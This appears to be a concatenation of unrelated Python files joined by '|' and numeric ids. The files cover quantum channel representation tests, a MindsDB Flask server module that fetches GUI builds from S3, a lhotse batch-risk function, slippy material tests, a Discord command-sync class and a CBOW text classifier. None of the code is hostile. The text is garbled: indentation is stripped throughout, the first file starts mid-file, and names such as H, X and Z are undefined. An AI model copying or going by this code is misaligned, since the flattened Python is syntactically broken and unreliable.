# two-qubit channel conversions to gain additional confidence.
def amplitude_damping_kraus(p):
Ad0 = np.asarray([[1, 0], [0, np.sqrt(1 - p)]])
Ad1 = np.asarray([[0, np.sqrt(p)], [0, 0]])
return [Ad0, Ad1]
def amplitude_damping_chi(p):
poly1 = (1 + np.sqrt(1 - p)) ** 2
poly2 = (-1 + np.sqrt(1 - p)) ** 2
ad_pro = 0.25 * np.asarray([[poly1, 0, 0, p],
[0, p, -1j * p, 0],
[0, 1j * p, p, 0],
[p, 0, 0, poly2]])
return ad_pro
def amplitude_damping_pauli(p):
poly1 = np.sqrt(1 - p)
ad_pau = np.asarray([[1, 0, 0, 0],
[0, poly1, 0, 0],
[0, 0, poly1, 0],
[p, 0, 0, 1 - p]])
return ad_pau
def amplitude_damping_super(p):
poly1 = np.sqrt(1 - p)
ad_sup = np.asarray([[1, 0, 0, p],
[0, poly1, 0, 0],
[0, 0, poly1, 0],
[0, 0, 0, 1 - p]])
return ad_sup
def amplitude_damping_choi(p):
poly1 = np.sqrt(1 - p)
ad_choi = np.asarray([[1, 0, 0, poly1],
[0, 0, 0, 0],
[0, 0, p, 0],
[poly1, 0, 0, 1 - p]])
return ad_choi
HADChi = 0.5 * np.asarray([[0, 0, 0, 0],
[0, 1, 0, 1],
[0, 0, 0, 0],
[0, 1, 0, 1]])
HADPauli = 1.0 * np.asarray([[1, 0, 0, 0],
[0, 0, 0, 1],
[0, 0, -1, 0],
[0, 1, 0, 0]])
HADSuper = 0.5 * np.asarray([[1, 1, 1, 1],
[1, -1, 1, -1],
[1, 1, -1, -1],
[1, -1, -1, 1]])
HADChoi = 0.5 * np.asarray([[1, 1, 1, -1],
[1, 1, 1, -1],
[1, 1, 1, -1],
[-1, -1, -1, 1]])
# Single Qubit Pauli Channel
def one_q_pauli_channel_chi(px, py, pz):
p = (px + py + pz)
pp_chi = np.asarray([[1 - p, 0, 0, 0],
[0, px, 0, 0],
[0, 0, py, 0],
[0, 0, 0, pz]])
return pp_chi
# Pauli twirled Amplitude damping channel
def analytical_pauli_twirl_of_AD_chi(p):
# see equation 7 of https://arxiv.org/pdf/1701.03708.pdf
poly1 = (2 + 2 * np.sqrt(1 - p) - p) / 4
poly2 = p / 4
poly3 = (2 - 2 * np.sqrt(1 - p) - p) / 4
pp_chi = np.asarray([[poly1, 0, 0, 0],
[0, poly2, 0, 0],
[0, 0, poly2, 0],
[0, 0, 0, poly3]])
return pp_chi
# I \otimes Z channel or gate (two qubits)
two_qubit_paulis = n_qubit_pauli_basis(2)
IZKraus = two_qubit_paulis.ops_by_label['IZ']
IZSuper = np.diag([1, -1, 1, -1, -1, 1, -1, 1, 1, -1, 1, -1, -1, 1, -1, 1])
# one and zero state as a density matrix
ONE_STATE = np.asarray([[0, 0], [0, 1]])
ZERO_STATE = np.asarray([[1, 0], [0, 0]])
# Amplitude damping Kraus operators with p = 0.1
AdKrausOps = amplitude_damping_kraus(.1)
# Use Kraus operators to find output of channel i.e.
# rho_out = A_0 rho A_0^\dag + A_1 rho A_1^\dag.
rho_out = np.matmul(np.matmul(AdKrausOps[0], ONE_STATE), AdKrausOps[0].transpose().conj()) + \
np.matmul(np.matmul(AdKrausOps[1], ONE_STATE), AdKrausOps[1].transpose().conj())
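# For p = 0.1 and input ONE_STATE this evaluates to [[0.1, 0], [0, 0.9]]:
# the excited state decays to |0> with probability p.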
def test_vec():
A = np.asarray([[1, 2], [3, 4]])
B = np.asarray([[1, 2, 5], [3, 4, 6]])
np.testing.assert_array_equal(np.array([[1], [3], [2], [4]]), vec(A))
np.testing.assert_array_equal(np.array([[1], [3], [2], [4], [5], [6]]), vec(B))
def test_unvec():
A = np.asarray([[1, 2], [3, 4]])
C = np.asarray([[1, 2, 3], [4, 5, 6], [7, 8, 9]])
np.testing.assert_array_equal(A, unvec(vec(A)))
np.testing.assert_array_equal(C, unvec(vec(C)))
def test_kraus_ops_sum_to_identity():
# Check kraus ops sum to identity
p = np.random.rand()
Ad0, Ad1 = amplitude_damping_kraus(p)
np.testing.assert_array_almost_equal_nulp(np.matmul(Ad0.transpose().conj(), Ad0)
+ np.matmul(Ad1.transpose().conj(), Ad1), np.eye(2))
def test_kraus2chi():
assert np.allclose(HADChi, kraus2chi(H))
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdChi = amplitude_damping_chi(p)
assert np.allclose(AdChi, kraus2chi(AdKraus))
assert np.allclose(superop2chi(IZSuper), kraus2chi(IZKraus))
def test_kraus2pauli_liouville():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(kraus2pauli_liouville(AdKraus), AdPauli)
assert np.allclose(kraus2pauli_liouville(H), HADPauli)
def test_kraus2superop():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdSuper = amplitude_damping_super(p)
np.testing.assert_array_almost_equal_nulp(kraus2superop(AdKraus), AdSuper)
# test application of super operator is the same as application of Kraus ops
ONE_STATE_VEC = vec(ONE_STATE)
np.testing.assert_array_almost_equal_nulp(unvec(np.matmul(kraus2superop(AdKrausOps),
ONE_STATE_VEC)), rho_out)
assert np.allclose(kraus2superop(H), HADSuper)
assert np.allclose(kraus2superop(IZKraus), IZSuper)
# Below here tests non square Kraus operators
    # In this example the Kraus operator is M_0 = I \otimes <0|, where <0| = (1, 0)
Idd = np.asarray([[1, 0], [0, 1]])
M0 = np.kron(Idd, np.asarray([[1, 0]]))
attempt = kraus2superop(M0)
answer = np.kron(M0.conj(), M0)
assert np.allclose(answer, attempt)
def test_kraus2choi():
p = np.random.rand()
AdKraus = amplitude_damping_kraus(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(kraus2choi(AdKraus), AdChoi)
assert np.allclose(kraus2choi(H), HADChoi)
def test_chi2pauli_liouville():
p = np.random.rand()
AdChi = amplitude_damping_chi(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdPauli, chi2pauli_liouville(AdChi))
assert np.allclose(HADPauli, chi2pauli_liouville(HADChi))
def test_basis_transform_p_to_c():
xz_pauli_basis = np.zeros((16, 1))
xz_pauli_basis[7] = [1.]
assert np.allclose(unvec(pauli2computational_basis_matrix(4) @ xz_pauli_basis), np.kron(X, Z))
def test_basis_transform_c_to_p():
xz_pauli_basis = np.zeros((16, 1))
xz_pauli_basis[7] = [1.]
assert np.allclose(computational2pauli_basis_matrix(4) @ vec(np.kron(X, Z)), xz_pauli_basis)
def test_pl_to_choi():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
pl = kraus2pauli_liouville(pauli[1])
choi = kraus2choi(pauli[1])
assert np.allclose(choi, pauli_liouville2choi(pl))
pl = kraus2pauli_liouville(H)
choi = kraus2choi(H)
assert np.allclose(choi, pauli_liouville2choi(pl))
def test_superop_to_kraus():
assert np.allclose(superop2kraus(IZSuper), IZKraus)
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdKraus = amplitude_damping_kraus(p)
kraus_ops = superop2kraus(AdSuper)
# the order of the Kraus ops matters
# TODO: fix the sign problem in Kraus operators
assert np.allclose([np.abs(kraus_ops[1]), np.abs(kraus_ops[0])], AdKraus)
def test_superop_to_choi():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
superop = kraus2superop(pauli[1])
choi = kraus2choi(pauli[1])
assert np.allclose(choi, superop2choi(superop))
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(AdChoi, superop2choi(AdSuper))
superop = kraus2superop(H)
choi = kraus2choi(H)
assert np.allclose(choi, superop2choi(superop))
def test_superop_to_pl():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdPauli, superop2pauli_liouville(AdSuper))
AdKraus = amplitude_damping_kraus(p)
superop = kraus2superop(AdKraus)
pauli = kraus2pauli_liouville(AdKraus)
assert np.allclose(pauli, superop2pauli_liouville(superop))
def test_pauli_liouville_to_superop():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdPauli = amplitude_damping_pauli(p)
assert np.allclose(AdSuper, pauli_liouville2superop(AdPauli))
AdKraus = amplitude_damping_kraus(p)
superop = kraus2superop(AdKraus)
pauli = kraus2pauli_liouville(AdKraus)
assert np.allclose(superop, pauli_liouville2superop(pauli))
def test_choi_to_kraus():
for i, pauli in enumerate(n_qubit_pauli_basis(2)):
choi = kraus2choi(pauli[1])
kraus = choi2kraus(choi)
assert np.allclose(choi, kraus2choi(kraus))
id_choi = np.array([[1, 0, 0, 1], [0, 0, 0, 0], [0, 0, 0, 0], [1, 0, 0, 1]])
assert np.allclose(kraus2choi(choi2kraus(id_choi)), id_choi)
for kraus in choi2kraus(id_choi):
assert np.allclose(abs(kraus), np.eye(2)) or np.allclose(kraus, np.zeros((2, 2)))
def test_choi_to_super():
p = np.random.rand()
AdSuper = amplitude_damping_super(p)
AdChoi = amplitude_damping_choi(p)
assert np.allclose(AdSuper, choi2superop(AdChoi))
def test_choi_pl_bijectivity():
assert np.allclose(choi2superop(choi2superop(np.eye(4))), np.eye(4))
assert np.allclose(superop2choi(superop2choi(np.eye(4))), np.eye(4))
h_choi = kraus2choi(H)
h_superop = kraus2superop(H)
assert np.allclose(choi2superop(choi2superop(h_choi)), h_choi)
assert np.allclose(superop2choi(superop2choi(h_superop)), h_superop)
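# A minimal roundtrip sketch (an addition, not part of the original suite): it reuses only
# converters already exercised above and checks that chaining superoperator <-> Choi and
# superoperator <-> Pauli-Liouville conversions recovers the original representation for a
# random amplitude damping channel.
def test_representation_roundtrips():
    p = np.random.rand()
    AdSuper = amplitude_damping_super(p)
    # superop -> Choi -> superop should round-trip exactly
    assert np.allclose(AdSuper, choi2superop(superop2choi(AdSuper)))
    # superop -> Pauli-Liouville -> superop should also round-trip exactly
    assert np.allclose(AdSuper, pauli_liouville2superop(superop2pauli_liouville(AdSuper)))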
|
17263
|
from distutils.version import LooseVersion
import requests
import os
import shutil
import threading
import webbrowser
from zipfile import ZipFile
from pathlib import Path
import traceback
import tempfile
# import concurrent.futures
from flask import Flask, url_for, make_response
from flask.json import dumps
from flask_restx import Api
from mindsdb.__about__ import __version__ as mindsdb_version
from mindsdb.interfaces.datastore.datastore import DataStore
from mindsdb.interfaces.model.model_interface import ModelInterface
from mindsdb.interfaces.database.integrations import IntegrationController
from mindsdb.utilities.ps import is_pid_listen_port, wait_func_is_true
from mindsdb.utilities.telemetry import inject_telemetry_to_static
from mindsdb.utilities.config import Config
from mindsdb.utilities.log import get_log
from mindsdb.interfaces.storage.db import session
from mindsdb.utilities.json_encoder import CustomJSONEncoder
class Swagger_Api(Api):
"""
This is a modification of the base Flask Restplus Api class due to the issue described here
https://github.com/noirbizarre/flask-restplus/issues/223
"""
@property
def specs_url(self):
return url_for(self.endpoint("specs"), _external=False)
def custom_output_json(data, code, headers=None):
resp = make_response(dumps(data), code)
resp.headers.extend(headers or {})
return resp
def get_last_compatible_gui_version() -> LooseVersion:
log = get_log('http')
try:
res = requests.get('https://mindsdb-web-builds.s3.amazonaws.com/compatible-config.json', timeout=5)
except (ConnectionError, requests.exceptions.ConnectionError) as e:
print(f'No connection: {e}')
return False
except Exception as e:
print(f'Something went wrong while getting compatible-config.json: {e}')
return False
if res.status_code != 200:
print(f"Can't get compatible-config.json: returned status code = {res.status_code}")
return False
try:
versions = res.json()
except Exception as e:
print(f"Can't decode compatible-config.json: {e}")
return False
current_mindsdb_lv = LooseVersion(mindsdb_version)
try:
gui_versions = {}
max_mindsdb_lv = None
max_gui_lv = None
for el in versions['mindsdb']:
if el['mindsdb_version'] is None:
gui_lv = LooseVersion(el['gui_version'])
else:
mindsdb_lv = LooseVersion(el['mindsdb_version'])
gui_lv = LooseVersion(el['gui_version'])
if mindsdb_lv.vstring not in gui_versions or gui_lv > gui_versions[mindsdb_lv.vstring]:
gui_versions[mindsdb_lv.vstring] = gui_lv
if max_mindsdb_lv is None or max_mindsdb_lv < mindsdb_lv:
max_mindsdb_lv = mindsdb_lv
if max_gui_lv is None or max_gui_lv < gui_lv:
max_gui_lv = gui_lv
all_mindsdb_lv = [LooseVersion(x) for x in gui_versions.keys()]
all_mindsdb_lv.sort()
if current_mindsdb_lv.vstring in gui_versions:
gui_version_lv = gui_versions[current_mindsdb_lv.vstring]
elif current_mindsdb_lv > all_mindsdb_lv[-1]:
gui_version_lv = max_gui_lv
else:
lower_versions = {key: value for key, value in gui_versions.items() if LooseVersion(key) < current_mindsdb_lv}
if len(lower_versions) == 0:
gui_version_lv = gui_versions[all_mindsdb_lv[0].vstring]
else:
all_lower_versions = [LooseVersion(x) for x in lower_versions.keys()]
gui_version_lv = gui_versions[all_lower_versions[-1].vstring]
except Exception as e:
log.error(f'Error in compatible-config.json structure: {e}')
return False
return gui_version_lv
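# Illustrative only: the minimal shape of compatible-config.json that the parser above
# accepts, inferred from the loop over versions['mindsdb']; the version numbers below are
# made up and the hosted file may contain additional fields that are simply ignored here.
# {
#     "mindsdb": [
#         {"mindsdb_version": "22.3.1.0", "gui_version": "22.3.1.0"},
#         {"mindsdb_version": null, "gui_version": "22.3.2.0"}
#     ]
# }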
def get_current_gui_version() -> LooseVersion:
config = Config()
static_path = Path(config['paths']['static'])
version_txt_path = static_path.joinpath('version.txt')
current_gui_version = None
if version_txt_path.is_file():
with open(version_txt_path, 'rt') as f:
current_gui_version = f.readline()
current_gui_lv = None if current_gui_version is None else LooseVersion(current_gui_version)
return current_gui_lv
def download_gui(destination, version):
if isinstance(destination, str):
destination = Path(destination)
log = get_log('http')
dist_zip_path = str(destination.joinpath('dist.zip'))
bucket = "https://mindsdb-web-builds.s3.amazonaws.com/"
resources = [{
'url': bucket + 'dist-V' + version + '.zip',
'path': dist_zip_path
}]
def get_resources(resource):
response = requests.get(resource['url'])
if response.status_code != requests.status_codes.codes.ok:
raise Exception(f"Error {response.status_code} GET {resource['url']}")
with open(resource['path'], 'wb') as f:
f.write(response.content)
try:
for r in resources:
get_resources(r)
except Exception as e:
log.error(f'Error during downloading files from s3: {e}')
return False
static_folder = destination
static_folder.mkdir(mode=0o777, exist_ok=True, parents=True)
ZipFile(dist_zip_path).extractall(static_folder)
if static_folder.joinpath('dist').is_dir():
shutil.move(str(destination.joinpath('dist').joinpath('index.html')), static_folder)
shutil.move(str(destination.joinpath('dist').joinpath('assets')), static_folder)
shutil.rmtree(destination.joinpath('dist'))
os.remove(dist_zip_path)
version_txt_path = destination.joinpath('version.txt')
with open(version_txt_path, 'wt') as f:
f.write(version)
return True
'''
# to make downloading faster download each resource in a separate thread
with concurrent.futures.ThreadPoolExecutor(max_workers=5) as executor:
future_to_url = {executor.submit(get_resources, r): r for r in resources}
for future in concurrent.futures.as_completed(future_to_url):
res = future.result()
if res is not None:
raise res
'''
def initialize_static():
success = update_static()
session.close()
return success
def update_static():
''' Update the Scout (GUI) static files based on compatible-config.json content.
Files will be downloaded and updated if the new GUI version > the current one.
The current GUI version is stored in static/version.txt.
'''
config = Config()
log = get_log('http')
static_path = Path(config['paths']['static'])
last_gui_version_lv = get_last_compatible_gui_version()
current_gui_version_lv = get_current_gui_version()
if last_gui_version_lv is False:
return False
if current_gui_version_lv is not None:
if current_gui_version_lv >= last_gui_version_lv:
return True
log.info(f'New version of GUI available ({last_gui_version_lv.vstring}). Downloading...')
temp_dir = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
success = download_gui(temp_dir, last_gui_version_lv.vstring)
if success is False:
shutil.rmtree(temp_dir)
return False
temp_dir_for_rm = tempfile.mkdtemp(prefix='mindsdb_gui_files_')
shutil.rmtree(temp_dir_for_rm)
shutil.copytree(str(static_path), temp_dir_for_rm)
shutil.rmtree(str(static_path))
shutil.copytree(temp_dir, str(static_path))
shutil.rmtree(temp_dir_for_rm)
log.info(f'GUI version updated to {last_gui_version_lv.vstring}')
return True
def initialize_flask(config, init_static_thread, no_studio):
# Apparently there's a bug that causes the static path not to work if it's '/' (https://github.com/pallets/flask/issues/3134); using '' should achieve the same thing.
if no_studio:
app = Flask(
__name__
)
else:
static_path = os.path.join(config['paths']['static'], 'static/')
if os.path.isabs(static_path) is False:
static_path = os.path.join(os.getcwd(), static_path)
app = Flask(
__name__,
static_url_path='/static',
static_folder=static_path
)
app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 60
app.config['SWAGGER_HOST'] = 'http://localhost:8000/mindsdb'
app.json_encoder = CustomJSONEncoder
authorizations = {
'apikey': {
'type': 'session',
'in': 'query',
'name': 'session'
}
}
api = Swagger_Api(
app,
authorizations=authorizations,
security=['apikey'],
url_prefix=':8000',
prefix='/api',
doc='/doc/'
)
api.representations['application/json'] = custom_output_json
port = config['api']['http']['port']
host = config['api']['http']['host']
# NOTE: rewrite this; it is a hotfix to show the GUI link
if not no_studio:
log = get_log('http')
if host in ('', '0.0.0.0'):
url = f'http://127.0.0.1:{port}/'
else:
url = f'http://{host}:{port}/'
log.info(f' - GUI available at {url}')
pid = os.getpid()
x = threading.Thread(target=_open_webbrowser, args=(url, pid, port, init_static_thread, config['paths']['static']), daemon=True)
x.start()
return app, api
def initialize_interfaces(app):
app.original_data_store = DataStore()
app.original_model_interface = ModelInterface()
app.original_integration_controller = IntegrationController()
config = Config()
app.config_obj = config
def _open_webbrowser(url: str, pid: int, port: int, init_static_thread, static_folder):
"""Open webbrowser with url when http service is started.
If some error then do nothing.
"""
init_static_thread.join()
inject_telemetry_to_static(static_folder)
logger = get_log('http')
try:
is_http_active = wait_func_is_true(func=is_pid_listen_port, timeout=10,
pid=pid, port=port)
if is_http_active:
webbrowser.open(url)
except Exception as e:
logger.error(f'Failed to open {url} in webbrowser with exception {e}')
logger.error(traceback.format_exc())
session.close()
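# Hypothetical wiring sketch (not part of this module's API surface): the caller is expected
# to run initialize_static() in a background thread and pass that thread to initialize_flask(),
# which hands it to _open_webbrowser() so the browser only opens once the static files are ready.
#
# init_static_thread = threading.Thread(target=initialize_static)
# init_static_thread.start()
# app, api = initialize_flask(Config(), init_static_thread, no_studio=False)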
|
17269
|
import warnings
from typing import Dict, Tuple
from lhotse import CutSet
from lhotse.dataset.sampling.base import CutSampler
def find_pessimistic_batches(
sampler: CutSampler, batch_tuple_index: int = 0
) -> Tuple[Dict[str, CutSet], Dict[str, float]]:
"""
Function for finding 'pessimistic' batches, i.e. batches that have the highest potential
to blow up the GPU memory during training. We will fully iterate the sampler and record
the most risky batches under several criteria:
- single longest cut
- single longest supervision
- largest batch cuts duration
- largest batch supervisions duration
- max num cuts
- max num supervisions
.. note: It is up to the users to convert the sampled CutSets into actual batches and test them
by running forward and backward passes with their model.
Example of how this function can be used with a PyTorch model
and a :class:`~lhotse.dataset.K2SpeechRecognitionDataset`::
sampler = SingleCutSampler(cuts, max_duration=300)
dataset = K2SpeechRecognitionDataset()
batches, scores = find_pessimistic_batches(sampler)
for reason, cuts in batches.items():
try:
batch = dataset[cuts]
outputs = model(batch)
loss = loss_fn(outputs)
loss.backward()
except:
print(f"Exception caught when evaluating pessimistic batch for: {reason}={scores[reason]}")
raise
:param sampler: An instance of a Lhotse :class:`.CutSampler`.
:param batch_tuple_index: Applicable to samplers that return tuples of :class:`~lhotse.cut.CutSet`.
Indicates which position in the tuple we should look up for the CutSet.
:return: A tuple of dicts: the first with batches (as CutSets) and the other with criteria values, i.e.:
``({"<criterion>": <CutSet>, ...}, {"<criterion>": <value>, ...})``
"""
criteria = {
"single_longest_cut": lambda cuts: max(c.duration for c in cuts),
"single_longest_supervision": lambda cuts: max(
sum(s.duration for s in c.supervisions) for c in cuts
),
"largest_batch_cuts_duration": lambda cuts: sum(c.duration for c in cuts),
"largest_batch_supervisions_duration": lambda cuts: sum(
s.duration for c in cuts for s in c.supervisions
),
"max_num_cuts": len,
"max_num_supervisions": lambda cuts: sum(
1 for c in cuts for _ in c.supervisions
),
}
try:
sampler = iter(sampler)
first_batch = next(sampler)
if isinstance(first_batch, tuple):
first_batch = first_batch[batch_tuple_index]
except StopIteration:
warnings.warn("Empty sampler encountered in find_pessimistic_batches()")
return {}, {}
top_batches = {k: first_batch for k in criteria}
top_values = {k: fn(first_batch) for k, fn in criteria.items()}
for batch in sampler:
if isinstance(batch, tuple):
batch = batch[batch_tuple_index]
for crit, fn in criteria.items():
val = fn(batch)
if val > top_values[crit]:
top_values[crit] = val
top_batches[crit] = batch
return top_batches, top_values
|
17278
|
import numpy as np
import numpy.testing as npt
import slippy
import slippy.core as core
"""
If you add a material you need to add the properties that it will be tested with to the material_parameters dict;
the key should be the name of the class (whatever it is declared as after the class keyword).
The value should be a tuple of dicts:
The first dict in the tuple will be unpacked to instantiate the class,
The second will be used with the displacement from loads method,
The third will be used with the loads from displacement method to ensure that the methods are inverses of each other.
If there is a limit to the applicability of the displacement from loads method (such as for a perfectly plastic
material), the _max_load key word should be set in the second dict.
For more complex behaviour please also implement your own tests; an illustrative, commented-out example entry is
sketched just after the material_parameters dict below.
"""
material_parameters = {
'Elastic': ({'name': 'steel_5', 'properties': {'E': 200e9, 'v': 0.3}},
{'grid_spacing': 0.01, 'simple': True},
{'grid_spacing': 0.01, 'simple': True, 'tol': 1e-9}),
'Rigid': ({}, {}, {})
}
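# Hypothetical example of an additional entry (the 'ViscoElastic' class and its numbers are
# illustrative only and not part of slippy); the three dicts follow the convention described
# in the module docstring above:
# material_parameters['ViscoElastic'] = (
#     {'name': 'rubber_1', 'properties': {'E': 0.1e9, 'v': 0.49}},   # unpacked into the constructor
#     {'grid_spacing': 0.01, 'simple': True, '_max_load': 1e6},      # displacement_from_surface_loads kwargs
#     {'grid_spacing': 0.01, 'simple': True, 'tol': 1e-9},           # loads_from_surface_displacement kwargs
# )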
exceptions = [core.Rigid]
def test_materials_basic():
# check that one of influence matrix or displacement from loading is given
for material in core.materials._IMMaterial._subclass_registry:
if material in exceptions:
continue
try:
mat_params = material_parameters[material.material_type]
except KeyError:
raise AssertionError(f"Material test parameters are not specified, for material {material.material_type}")
mat_instance = material(**mat_params[0])
max_load = mat_params[1].pop('_max_load', 1)
np.random.seed(0)
loads = np.random.rand(16, 16) * max_load
# check that the loads and displacement functions are inverse of each other
for direction in {'x', 'y', 'z'}:
load_in_direction = {direction: loads}
displacement = mat_instance.displacement_from_surface_loads(load_in_direction, **mat_params[1])
set_disp = displacement[direction]
loads_calc = mat_instance.loads_from_surface_displacement(displacements={direction: set_disp},
**mat_params[2])
npt.assert_allclose(loads, slippy.asnumpy(loads_calc[direction]), atol=max_load * 0.02)
def test_elastic_coupled():
mat = core.Elastic('steel_6', {'E': 200e9, 'v': 0.3})
np.random.seed(0)
loads1 = np.random.rand(16, 16)
loads2 = np.random.rand(16, 16)
directions = 'xyzx'
for i in range(3):
dir_1 = directions[i]
dir_2 = directions[i+1]
loads_in_direction = {dir_1: loads1, dir_2: loads2}
displacement = mat.displacement_from_surface_loads(loads_in_direction, grid_spacing=0.01, simple=True)
loads_calc = mat.loads_from_surface_displacement(displacements=displacement,
grid_spacing=0.01, simple=True)
for direction in [dir_1, dir_2]:
npt.assert_allclose(loads_in_direction[direction], slippy.asnumpy(loads_calc[direction]), atol=0.02)
displacement = mat.displacement_from_surface_loads(loads_in_direction, grid_spacing=0.01, simple=False)
loads_calc = mat.loads_from_surface_displacement(displacements=displacement,
grid_spacing=0.01, simple=False)
for direction in [dir_1, dir_2]:
npt.assert_allclose(loads_in_direction[direction], slippy.asnumpy(loads_calc[direction]), atol=0.02)
|
17306
|
from typing import List
from .command import Command, ApiCommand
class Application:
def __init__(self, client):
self.client = client
self.http = client.http
self.__commands = []
async def fetch_commands(self) -> List[ApiCommand]:
"""
Fetch the application commands registered with the Discord API.
Returns
-------
List[ApiCommand] : the list of commands.
"""
datas = await self.http.fetch_commands()
return [ApiCommand.from_dict(self, data) for data in datas]
def _check_command(self, command, api):
return command.description != api.description
async def setup_command(self) -> None:
"""
Synchronise the locally registered application commands with the Discord API:
delete API commands that are no longer registered locally and register local
commands that the API does not know about yet.
"""
apis = await self.fetch_commands()
local_names = [command.name for command in self.__commands]
api_names = [api.name for api in apis]
# remove commands that exist on the API side but not locally
for api in apis:
if api.name not in local_names:
await api.delete()
# register local commands that are missing on the API side
for command in self.__commands:
if command.name not in api_names:
await self.http.add_command(command)
def add_command(self, command: Command) -> None:
"""
Add a Discord application command.
Examples
--------
```python
from discord_api import Client, Command
client = Client()
client.add_command(Command(name = "ping", description = "pong"))
client.run("ToKeN")
```
"""
self.__commands.append(command)
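# Hypothetical end-to-end sketch (assumes the Client wires an Application instance up as
# `client.application` and that setup_command() is awaited once the client is ready; adjust
# to the actual client implementation):
#
# client = Client()
# client.add_command(Command(name="ping", description="pong"))
# # later, inside an async ready-hook:
# # await client.application.setup_command()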
|
17335
|
import torch
from torch import nn
class CBOWClassifier(nn.Module):
"""
Continuous bag of words classifier.
"""
def __init__(self, hidden_size, input_size, max_pool, dropout=0.5):
"""
:param hidden_size: dimensionality of the hidden layer
:param input_size: dimensionality of the input word embeddings
:param max_pool: if true then max pool over word embeddings,
else sum word embeddings
"""
super(CBOWClassifier, self).__init__()
self.hidden_size = hidden_size
self.input_size = input_size
self.max_pool = max_pool
self.dropout = nn.Dropout(p=dropout)
self.i2h = nn.Linear(self.input_size, self.hidden_size)
self.h2o = nn.Linear(self.hidden_size, 1)
self.sigmoid = nn.Sigmoid()
self.tanh = nn.Tanh()
def forward(self, x):
if self.max_pool:
encoding = nn.functional.max_pool1d(x.transpose(1, 2),
x.shape[1])
encoding = encoding.transpose(1, 2).squeeze()
else:
encoding = x.sum(1)
encoding = self.dropout(encoding)
hidden = self.tanh(self.dropout(self.i2h(encoding)))
out = self.sigmoid(self.h2o(hidden))
return out
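# Minimal usage sketch (the shapes are assumptions for illustration: a batch of 8 sequences,
# 20 tokens each, 300-dimensional word embeddings; random tensors stand in for real embeddings):
if __name__ == "__main__":
    model = CBOWClassifier(hidden_size=128, input_size=300, max_pool=True)
    model.eval()                                # disable dropout for the forward sketch
    dummy_embeddings = torch.rand(8, 20, 300)   # (batch, seq_len, embedding_dim)
    probs = model(dummy_embeddings)             # sigmoid probabilities, shape (8, 1)
    print(probs.shape)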
|